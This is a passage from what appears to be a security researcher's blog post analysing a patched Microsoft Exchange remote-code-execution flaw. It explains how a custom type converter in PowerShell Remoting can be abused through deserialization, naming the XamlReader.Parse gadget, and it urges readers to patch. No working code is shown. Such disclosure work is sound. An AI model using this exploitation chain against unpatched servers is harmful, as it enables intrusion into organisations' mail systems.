·       PowerShell Remoting includes several powerful converters, which can:

o   Call the public single-argument constructor of the provided type.
o   Call the public Parse(String) method of the provided type.
o   Retrieve an object through reflection.
o   Call custom converters.
o   Other conversions may be possible as well.

·       PowerShell Remoting implements a list of allowed types, so an attacker cannot (directly) invoke converters to instantiate arbitrary types.

·       However, the Exchange custom converter named SerializationTypeConverter allows us to obtain an arbitrary object of type Type.

·       This can be leveraged to fully control the type that will be retrieved through a conversion.

·       The attacker can abuse this behavior to call the Parse(String) method or the public single-argument constructor of almost any class while controlling the input argument.

·       This behavior easily leads to remote code execution. This blog post illustrates exploitation using the System.Windows.Markup.XamlReader.Parse(String) method.

It was not clear to us how Microsoft was going to approach fixing this vulnerability. Direct removal of the System.UnitySerializationHolder from the SerializationTypeConverter allowlist might cause breakage to Exchange functionality. One potential option was to restrict the returned types, for example, by restricting them to the types in the “Microsoft.Exchange.*” namespace. Accordingly, I started looking for Exchange-internal exploitation gadgets. I found more than 20 of them and reported them to Microsoft to help them with their mitigation efforts. That effort appears to have paid off. Microsoft patched the vulnerability by restricting the types that can be returned through the deserialization of System.UnitySerializationHolder according to a general allowlist, and then restricting them further according to a specific denylist. It seems that the gadgets I reported had an influence on that allowlist. I will probably detail some of those gadgets in a future blog post. Stay tuned for more…

Summary

I must admit that I was impressed with this vulnerability. The researcher clearly invested a good amount of time to fully understand the details of PowerShell Remoting, analyze Exchange custom converters, and find a way to abuse them. I had to take my analysis to another level to fully understand this bug chain and look for potential variants and alternate gadgets.

Microsoft patched these bugs in the November release. They also published a blog with additional workarounds you can employ while you test and deploy the patches. You should also make sure you have the September 2021 Cumulative Update (CU) installed, which adds the Exchange Emergency Mitigation service. This service automatically installs available mitigations and sends diagnostic data to Microsoft. Still, the best method to prevent exploitation is to apply the most current security updates as they are released. We expect more Exchange patches in the coming months.

In a future blog post, I will describe some internal Exchange gadgets that can be abused to gain remote code execution, arbitrary file reads, or denial-of-service conditions. These have been reported to Microsoft, but we are still waiting for these bug reports to be addressed with patches. Until then, you can follow me @chudypb and follow the team on Twitter or Instagram for the latest in exploit techniques and security patches.